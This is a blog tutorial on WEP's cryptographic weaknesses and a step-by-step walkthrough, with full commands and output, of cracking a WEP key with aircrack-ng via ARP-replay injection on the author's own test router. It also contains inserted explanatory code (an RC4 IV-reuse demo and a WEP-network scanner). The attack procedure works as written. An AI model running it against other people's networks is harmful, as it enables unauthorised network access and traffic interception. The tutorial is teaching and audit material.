Playing with other people's Wi-Fi part 1: The good old “WEP”
Many of us own a Wi-Fi network at home. It is great, convenient and there are no cables! When this technology first came into existence there were several competitors available as well (remember DECT? [wikipedia.org]). One of the key goals for the Wi-Fi developers was to drive the cost of equipment down, and in doing so they inevitably created two problems. Let me quickly talk about some basic issues in Wi-Fi and then we will move on to the practical cracking of WEP encryption. I intend this article to be the first in a series; I will mostly focus on end-user practicalities and only link to the most interesting theory articles.
Ok, so back to the problems Wi-Fi inherited. The first is that, to make the equipment as cheap as possible, the standard nearly ignored the case of two Wi-Fi networks operating on the same channel. You might remember that Wi-Fi takes Ethernet's “Carrier sense multiple access with collision detection” (CSMA/CD) and extends it to “Carrier sense multiple access with collision avoidance” (CSMA/CA). The extension introduced some great new messages like CTS (Clear to send) and RTS (Request to send). These control messages essentially hand control of access to the channel to the access point. The access point then manages all of its clients to avoid collisions, but if there are two independent access points, they pretty much do not care about each other and we are back to the old CSMA/CD behaviour with back-off timers and retransmissions after collisions.
The second drawback is that, in order to win the wireless standards race, the creators designed the initial security protection called “Wired Equivalent Privacy” (or WEP [wikipedia.org]) in a rush and without any public testing. The 802.11 wireless standard won the race, but soon afterwards WEP's flaws were identified and it was shown to be very easily penetrated.
It is actually easy to explain why it is so vulnerable. The main point is that the encryption algorithm behind it is a stream cipher (RC4) whose key is a combination of your “password” and a random 24-bit Initialization Vector (IV). Originally the WEP standard gave users a 40-bit password option and later also a 104-bit password option (add the 24-bit IV to get a 64-bit or 128-bit encryption key). This key encrypts all the traffic, while the continuously changing IV is supposed to provide protection against replay attacks. Technically RC4 produces a continuous stream of key bits, and these bits are XORed with each bit of the underlying data.
But the main security failure of this mechanism is that the Initialization Vector is “only 24 bits” long and cannot protect the key in a busy network. For example, it is estimated that an IV repeats roughly every 5000 packets. In 2001 a passive attack was published by Fluhrer, Mantin and Shamir that lets you simply capture packets from the air and then run the attack on them to recover the key very easily. In summary, all you have to do to crack the key is capture a very large number of packets, so that you collect a large number of IVs, and then start cracking the WEP key. Depending on the activity of the target network you can have the key in a few hours.
Furthermore, in 2007 the attack was significantly improved by a method called “ARP injection”. From this point it was no longer a passive attack, and thanks to that the attack time shrank to a few minutes. The idea is simple: it is possible to recognise ARP (Address Resolution Protocol) packets in the encrypted network without knowing the encryption key, then spoof a deauthentication of the originating client and re-send the captured ARP packet back to the network. Every re-sent ARP request lets you capture an additional IV by listening for the ARP reply. This is possible because the ARP packet structure is very static in nature and the ARP reply you get is always the same, only encrypted with a different IV. If you remember mathematics from school: when you get many ARP replies you can essentially construct a system of equations in which the plaintext and the password are fixed and only the IV varies. This speeds up the cracking process by several orders of magnitude.
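To make the two paragraphs above concrete, here is a small added example (my own code, not from the original post and not aircrack-ng). It models WEP's per-frame keying, RC4 keyed with IV || secret, on a simplified frame (no 802.11 header, ICV or FCS), and shows the two facts the text relies on: a 24-bit IV is expected to repeat after only a few thousand frames (the birthday bound), and once two frames share an IV their ciphertexts XOR to the XOR of their plaintexts, so a frame with predictable content, like an ARP packet, exposes the other one without the key. The key "apple" and the two 16-byte payloads are constructed demo values.

```python
# Added example (not from the original post or aircrack-ng): a toy model of
# WEP's per-frame keying, RC4(IV || secret), to show why a 24-bit IV is too
# small. Frame layout here is simplified (no 802.11 header, ICV or FCS).
import math


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4: key scheduling (KSA) followed by `length` PRGA output bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # KSA
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    i = j = 0
    out = bytearray()
    for _ in range(length):                   # PRGA
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(secret: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP style: the 3-byte IV is sent in clear, RC4 is keyed with IV || secret."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    return iv + xor_bytes(plaintext, rc4_keystream(iv + secret, len(plaintext)))


def wep_decrypt(secret: bytes, frame: bytes) -> bytes:
    iv, body = frame[:3], frame[3:]
    return xor_bytes(body, rc4_keystream(iv + secret, len(body)))


def keystream_reuse_leak(frame1: bytes, frame2: bytes):
    """Two frames under the same IV share a keystream, so C1 ^ C2 == P1 ^ P2
    without knowing the secret. Returns that XOR, or None if the IVs differ."""
    if frame1[:3] != frame2[:3]:
        return None
    return xor_bytes(frame1[3:], frame2[3:])


def frames_until_iv_repeat(iv_bits: int = 24, prob: float = 0.5) -> float:
    """Birthday bound: random IVs needed before a repeat occurs with probability `prob`."""
    space = 2 ** iv_bits
    return math.sqrt(2 * space * math.log(1 / (1 - prob)))


# Constructed demo values: the post's 40-bit key and two equal-length frames.
SECRET = b"apple"
KNOWN = b"ARP-header-bytes"   # a frame whose content is predictable (as ARP is)
HIDDEN = b"private payload!"  # same length, contents unknown to an observer


def demo() -> bytes:
    """Encrypt both frames under one reused IV and recover HIDDEN from KNOWN."""
    iv = b"\x01\x02\x03"
    f1 = wep_encrypt(SECRET, iv, KNOWN)
    f2 = wep_encrypt(SECRET, iv, HIDDEN)   # IV reused: identical keystream
    leak = keystream_reuse_leak(f1, f2)    # == KNOWN ^ HIDDEN
    return xor_bytes(leak, KNOWN)          # P2 = (C1 ^ C2) ^ P1


if __name__ == "__main__":
    print("recovered:", demo())
    print("IVs until a 50%% chance of a repeat: %.0f" % frames_until_iv_repeat())
```

The birthday figure comes out just under 5000 frames, which is where the "IV loops every 5000 packets" estimate above comes from; the full FMS and PTW attacks go further and recover the secret itself from weak IV/keystream relationships, which this toy deliberately does not implement.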
Practical example how to crack WEP
First, let's look at what we need for this task. For moral and legal reasons, please get your own access point and configure it with WEP encryption. Then we need two PCs (technically possible with one PC and two Wi-Fi cards, but two PCs are better). One PC will act as a client (so that it generates traffic) and the other PC will be the simulated attacker.
Regarding my personal hardware, I used a TP-Link 722n wireless card, with a great external antenna adapter and good support from the hacking tools. As a target I used my TP-Link 741ND Wi-Fi router. As a test client I used my iPhone.
For the software you can go in two directions. I personally dual-boot with BackTrack Linux. This is an Ubuntu-based distribution designed for penetration testing; it comes with the best selection of security auditing and penetration testing tools as well as already-modified drivers to support advanced attacks like ARP injection (which is not needed by a normal user). You can also simply download this image and start it as a live CD (or from USB). The second option is to start your own Linux distribution (yes, you need one) and install the aircrack-ng package (most probably test step 0 below first, and you may have to google whether your Wi-Fi card supports at minimum a promiscuous mode of operation).
Step 0. Initialize airmon-ng and test packet injection
First check with ifconfig whether your Wi-Fi card is recognised: as root type “ifconfig” and look for any wlanX or athX interface. If it is in a shut-down state, try “ifconfig -a” and then activate it with, for example, “ifconfig wlanX up”. In my example the card is wlan1 (wlan0 is the integrated Intel Wi-Fi that is not really usable for attacks).
root@bt:~# ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:1c:25:91:5c:93
          inet addr:192.168.10.170  Bcast:192.168.10.191  Mask:255.255.255.192
          inet6 addr: fe80::21c:25ff:fe91:5c93/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:15197 errors:0 dropped:0 overruns:0 frame:0
          TX packets:15980 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:4836106 (4.8 MB)  TX bytes:18487451 (18.4 MB)
          Interrupt:18

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:970 errors:0 dropped:0 overruns:0 frame:0
          TX packets:970 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:69553 (69.5 KB)  TX bytes:69553 (69.5 KB)

wlan0     Link encap:Ethernet  HWaddr 00:1f:3c:37:d1:c5
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

wlan1     Link encap:Ethernet  HWaddr d8:5d:4c:91:ab:41
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
So in the next step we start airmon-ng, which puts the wlan1 card into promiscuous mode and creates the virtual interface mon0 that we will use for the attacks.
root@bt:~# airmon-ng start wlan1

Found 3 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
1314    dhclient3
1525    dhclient3
11757   dhclient
Process with PID 1525 (dhclient3) is running on interface wlan0

Interface       Chipset         Driver

wlan1           Atheros AR9271  ath9k - [phy1]
                                (monitor mode enabled on mon0)
wlan0           Intel 3945ABG   iwl3945 - [phy0]
NOTE: Sometimes airmon-ng will tell you that there are programs running that can interfere with your network card and that you should close them, for example NetworkManager or dhclient. Kill them with the kill <pid> command before continuing.
Let's look at ifconfig again; you will notice a new interface in the output.
root@bt:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:1c:25:91:5c:93
          inet addr:192.168.10.170  Bcast:192.168.10.191  Mask:255.255.255.192
          inet6 addr: fe80::21c:25ff:fe91:5c93/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:15684 errors:0 dropped:0 overruns:0 frame:0
          TX packets:16179 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:4898437 (4.8 MB)  TX bytes:18514654 (18.5 MB)
          Interrupt:18

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:1011 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1011 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:72513 (72.5 KB)  TX bytes:72513 (72.5 KB)

mon0      Link encap:UNSPEC  HWaddr D8-5D-4C-91-AB-41-00-00-00-00-00-00-00-00-00-00
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:118351 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:28476367 (28.4 MB)  TX bytes:0 (0.0 B)

wlan0     Link encap:Ethernet  HWaddr 00:1f:3c:37:d1:c5
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

wlan1     Link encap:Ethernet  HWaddr d8:5d:4c:91:ab:41
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
Now let's test whether packet injection works. The test will also look around for networks on the same channel and try to send a few probe packets to them.
root@bt:~# aireplay-ng --test mon0
21:48:16  Trying broadcast probe requests...
21:48:16  Injection is working!
21:48:18  Found 1 APs

21:48:18  Trying directed probe requests...
21:48:19  F8:D1:11:37:C2:0E - channel: 6 - 'WEPcrackTest'
21:48:19  Ping (min/avg/max): 1.322ms/15.453ms/39.641ms Power: -88.62
21:48:19  29/30:  96%
Step 1. Find the target network using WEP.
For our little test, I configured my access point with a single Wi-Fi network called “WEPcrackTest”; let's pretend that we didn't know this. I would personally use inSSIDer, but there are alternatives directly on Linux like “ssidsniff” or “iwlist scanning”. So for simplicity, let's try “iwlist scanning”. You can identify WEP-encrypted networks as the cells that show “Encryption key:on” but have no WPA/WPA2 mentioned, as indicated below.
root@bt:~# iwlist wlan1 scanning
wlan1     Scan completed :
          Cell 01 - Address: F8:D1:11:37:C2:0E
                    Channel:6
                    Frequency:2.437 GHz (Channel 6)
                    Quality=24/70  Signal level=-86 dBm
                    Encryption key:on
                    ESSID:"WEPcrackTest"
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              9 Mb/s; 12 Mb/s; 18 Mb/s
                    Bit Rates:24 Mb/s; 36 Mb/s; 48 Mb/s; 54 Mb/s
                    Mode:Master
                    Extra:tsf=0000000021c87180
                    Extra: Last beacon: 576ms ago
                    IE: Unknown: 000C574550637261636B54657374
                    IE: Unknown: 010882848B960C121824
                    IE: Unknown: 030106
                    IE: Unknown: 050400010000
                    IE: Unknown: 0706534B20010D14
                    IE: Unknown: 2A0100
                    IE: Unknown: 32043048606C
                    IE: Unknown: DD180050F2020101820003A4000027A4000042435E0062322F00
                    IE: Unknown: DD0900037F01010000FF7F
                    IE: Unknown: DD3F0050F204104A00011010440001021047001000000000000010000000F8D11137C210103C000101104900140024E26002000101600000020001600100020001
                    IE: Unknown: DD050050F20500
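The rule just described (“Encryption key:on” with no WPA/WPA2 IE means WEP) is easy to automate, which is handy when you want to audit your own site for legacy networks rather than eyeball a long scan. The following is an added example, my own code and not part of the original post; it parses the `iwlist` text format shown above. The sample scan is constructed: the first cell is the post's WEPcrackTest cell, the WPA2 and open cells (BSSIDs 00:11:22:33:44:55 and 66:77:88:99:AA:BB) are made up for contrast.

```python
# Added example (not from the original post): classify the cells in an
# `iwlist <iface> scanning` dump so WEP-protected networks can be flagged in
# your own inventory. SAMPLE_SCAN is constructed: the first cell copies the
# post's WEPcrackTest scan, the other two cells are invented for contrast.
import re

SAMPLE_SCAN = """\
wlan1     Scan completed :
          Cell 01 - Address: F8:D1:11:37:C2:0E
                    Channel:6
                    Frequency:2.437 GHz (Channel 6)
                    Quality=24/70  Signal level=-86 dBm
                    Encryption key:on
                    ESSID:"WEPcrackTest"
                    IE: Unknown: 000C574550637261636B54657374
          Cell 02 - Address: 00:11:22:33:44:55
                    Channel:11
                    Quality=40/70  Signal level=-70 dBm
                    Encryption key:on
                    ESSID:"ConstructedWPA2"
                    IE: IEEE 802.11i/WPA2 Version 1
                        Group Cipher : CCMP
          Cell 03 - Address: 66:77:88:99:AA:BB
                    Channel:1
                    Encryption key:off
                    ESSID:"ConstructedOpen"
"""

CELL_RE = re.compile(r"^\s*Cell \d+ - Address: ([0-9A-Fa-f:]{17})\s*$")


def parse_iwlist(text):
    """Split an iwlist dump into per-cell dicts: bssid, essid, channel, key_on, ies."""
    cells = []
    cur = None
    for line in text.splitlines():
        m = CELL_RE.match(line)
        if m:
            cur = {"bssid": m.group(1).upper(), "essid": None,
                   "channel": None, "key_on": False, "ies": []}
            cells.append(cur)
            continue
        if cur is None:          # header lines before the first cell
            continue
        s = line.strip()
        if s.startswith("ESSID:"):
            cur["essid"] = s[len("ESSID:"):].strip('"')
        elif s.startswith("Channel:"):
            cur["channel"] = int(s.split(":", 1)[1])
        elif s.startswith("Encryption key:"):
            cur["key_on"] = s.endswith("on")
        elif s.startswith("IE:"):
            cur["ies"].append(s[3:].strip())
    return cells


def classify(cell):
    """iwlist names WPA/WPA2 IEs it understands; key:on with none of them is WEP."""
    if not cell["key_on"]:
        return "OPEN"
    if any("WPA" in ie for ie in cell["ies"]):
        return "WPA/WPA2"
    return "WEP"


def wep_networks(text):
    """(essid, bssid, channel) for every cell the scan shows as WEP-only."""
    return [(c["essid"], c["bssid"], c["channel"])
            for c in parse_iwlist(text) if classify(c) == "WEP"]


if __name__ == "__main__":
    for c in parse_iwlist(SAMPLE_SCAN):
        print(f'{c["bssid"]}  ch{c["channel"]:<3} {classify(c):9} {c["essid"]}')
```

Feed it the real output with `parse_iwlist(subprocess.check_output(["iwlist", "wlan1", "scanning"], text=True))`; the “Unknown” vendor IEs are kept as opaque hex, so only the named WPA/WPA2 IEs that iwlist decodes drive the classification.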
Step 2. Start capturing IVs
Just as in the original passive attack, your first need is to capture enough IVs (at least 50,000) to have a chance of cracking the WEP key. This process is best run in parallel sessions, so please open another terminal window or use the “screen” command for a background session. We will use the airodump-ng command with “-c 6” telling it to capture on channel 6, “--bssid” specifying the MAC address of the access point's radio to select the target, and “-w” specifying the output file prefix where the captured packets are stored. The last parameter is the interface identifier, in our case “mon0”.
root@bt:~# airodump-ng -c 6 --bssid F8:D1:11:37:C2:0E -w ./WEP.cap mon0

 CH  6 ][ Elapsed: 0 s ][ 2013-07-15 22:45

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 F8:D1:11:37:C2:0E  -71 100       27        0    0   6  54e. WEP  WEP         WEPcrackTest

 BSSID              STATION            PWR   Rate    Lost  Frames  Probe
Ok, start the capture and leave it running until we have a lot of IVs.
Step 3. ARP injection attack to speed up IV capture.
The logic is as follows: we do a fake authentication against the access point and wait for any captured ARP packet; once we capture one we start re-sending it to the network, and the replies to our re-sent requests let the capture from step 2 collect a large number of IVs. But first we need to associate using the aireplay-ng command as follows. “-1 0” is the attack type, in this case fake authentication with 0 meaning a single association only. “-e WEPcrackTest” is the name of the network to associate to, “-a F8:D1:11:37:C2:0E” is the access point MAC address again, “-h D8:5D:4C:91:AB:41” is the MAC address of your wireless card (find it with the ifconfig command) and at the end is the Wi-Fi interface mon0.
root@bt:~# aireplay-ng -1 0 -e WEPcrackTest -a F8:D1:11:37:C2:0E -h D8:5D:4C:91:AB:41 mon0
23:13:59  Sending Authentication Request
23:14:01  Authentication successful
23:14:03  Sending Association Request
23:14:04  Association successful :-)
The second part is to start listening for ARP packets and, if such a packet arrives, initiate retransmission. To do this we use the aireplay-ng command with attack type “-3”, the Wi-Fi access point “-b F8:D1:11:37:C2:0E”, your Wi-Fi interface MAC address “-h D8:5D:4C:91:AB:41”, and we run this attack on interface mon0.
root@bt:~# aireplay-ng -3 -b F8:D1:11:37:C2:0E -h D8:5D:4C:91:AB:41 mon0
23:22:55  Waiting for beacon frame (BSSID: F8:D1:11:37:C2:0E) on channel 6
Saving ARP requests in replay_arp-0715-232255.cap
You should also start airodump-ng to capture replies.
Read 290 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
Great, notice the “sent 0 packets” at the end. Now we wait for a real client to connect, and once it does, the attack will start running automatically. In summary, right now you should have this replay attack running in one terminal and the capture from step 2 running in another.
Step 4. Simulating a legitimate user to trigger ARP replies
This step is artificial in our example; in a real attack you would just leave everything from the previous steps running and wait for some user on the network to send an ARP. To speed things up in our little test, I will connect my second interface card wlan0 to the test network and generate an ARP manually. So this is how you connect to a WEP network (notice that at this point I am telling you the key, which is “apple”):
root@bt:~# iwconfig wlan0 essid WEPcrackTest
root@bt:~# iwconfig wlan0 channel 6
root@bt:~# iwconfig wlan0 enc on key s:apple
root@bt:~# ifconfig wlan0 up
root@bt:~# dhclient wlan0
There is already a pid file /var/run/dhclient.pid with pid 9745
killed old client process, removed PID file
Internet Systems Consortium DHCP Client V3.1.3
Copyright 2004-2009 Internet Systems Consortium.
All rights reserved.
For info, please visit https://www.isc.org/software/dhcp/

mon0: unknown hardware address type 803
mon0: unknown hardware address type 803
Listening on LPF/wlan0/00:1f:3c:37:d1:c5
Sending on   LPF/wlan0/00:1f:3c:37:d1:c5
Sending on   Socket/fallback
DHCPREQUEST of 192.168.10.171 on wlan0 to 255.255.255.255 port 67
DHCPACK of 192.168.10.171 from 192.168.10.130
bound to 192.168.10.171 -- renewal in 111969 seconds.
Now let's have a look at the ARP table; you will most probably see that we have already resolved the default gateway during or after the DHCP negotiation, so one ARP has probably been captured already.
root@bt:~# arp -a
? (192.168.10.142) at 2c:59:e5:04:64:92 [ether] on eth0
? (192.168.10.130) at 00:0c:42:37:40:44 [ether] on wlan0
Now check your step 3 ARP replay attack to see whether it has already captured some ARP packets and is sending them back to the network. Most probably it will already be running crazy fast, sending all those ARP requests like below!
root@bt:~# aireplay-ng -3 -b F8:D1:11:37:C2:0E -h D8:5D:4C:91:AB:41 mon0
19:09:05  Waiting for beacon frame (BSSID: F8:D1:11:37:C2:0E) on channel 6
Saving ARP requests in replay_arp-0716-190905.cap
You should also start airodump-ng to capture replies.
Read 286478 packets (got 91977 ARP requests and 95113 ACKs), sent 95116 packets...(500 pps)
Also, if you look at the capture from step 2, you will notice that the capture rate has accelerated several times over. And notice that the traffic appears “as if” it were coming from the host with MAC address D8:5D:4C:91:AB:41. This is the MAC address of our wlan1 card (the one behind mon0), but this large number of packets is definitely not normal client traffic from that interface.
root@bt:~# airodump-ng -c 6 --bssid F8:D1:11:37:C2:0E -w ./WEP.cap mon0

 CH  6 ][ Elapsed: 4 mins ][ 2013-07-16 19:13

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 F8:D1:11:37:C2:0E  -45  87     2884   107421  441   6  54e. WPA  WEP    OPN  WEPcrackTest

 BSSID              STATION            PWR   Rate    Lost  Frames  Probe
 F8:D1:11:37:C2:0E  D8:5D:4C:91:AB:41    0    0 - 1    765  234755
 F8:D1:11:37:C2:0E  00:1F:3C:37:D1:C5  -49   54e- 1e     0    1751  WEPcrackTest
Step 5. Wait and crack
Now we leave it running for a little while and periodically test whether we already have enough IVs to crack the key. In step 2 I used the -w parameter to write all captured traffic to a file called WEP.cap (airodump-ng appends a counter, so the actual file is WEP.cap-01.cap). You will notice that the file size increases over time. We will use the aircrack-ng -b F8:D1:11:37:C2:0E ./WEP.cap command: -b specifies which access point's traffic is of interest to us (because in step 2 you can capture from multiple networks at once), and at the end we specify the file to use as the source of data. In the run below I left -b out, so aircrack-ng simply picks the first network it finds in the file.
root@bt:~# aircrack-ng ./WEP.cap
Opening ./WEP.cap
Read 1459354 packets.

   #  BSSID              ESSID                     Encryption

   1  F8:D1:11:37:C2:0E  WEPcrackTest              WEP (336090 IVs)

Choosing first network as target.

Opening ./WEP.cap-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 337296 ivs.

                         KEY FOUND! [ 61:70:70:6C:65 ] (ASCII: apple )
        Decrypted correctly: 100%
And there you have it: “KEY FOUND!” and it is shown as “ASCII: apple”. This was very easy, no?
Conclusion
In summary: whatever the reason, do not operate WEP encryption on your Wi-Fi network. I know that this is an old technology and, with standards like 802.11n not even having direct support for it anymore, it will eventually die. But until then: I scanned the area around my home with a 24 dB antenna and located three WEP-encrypted networks out of the 27 networks around. So there are still people who can be exploited and probably have no idea about it. Make sure you are not one of them.
I am already writing the next part, about cracking WPA/WPA2 using WPS vulnerabilities.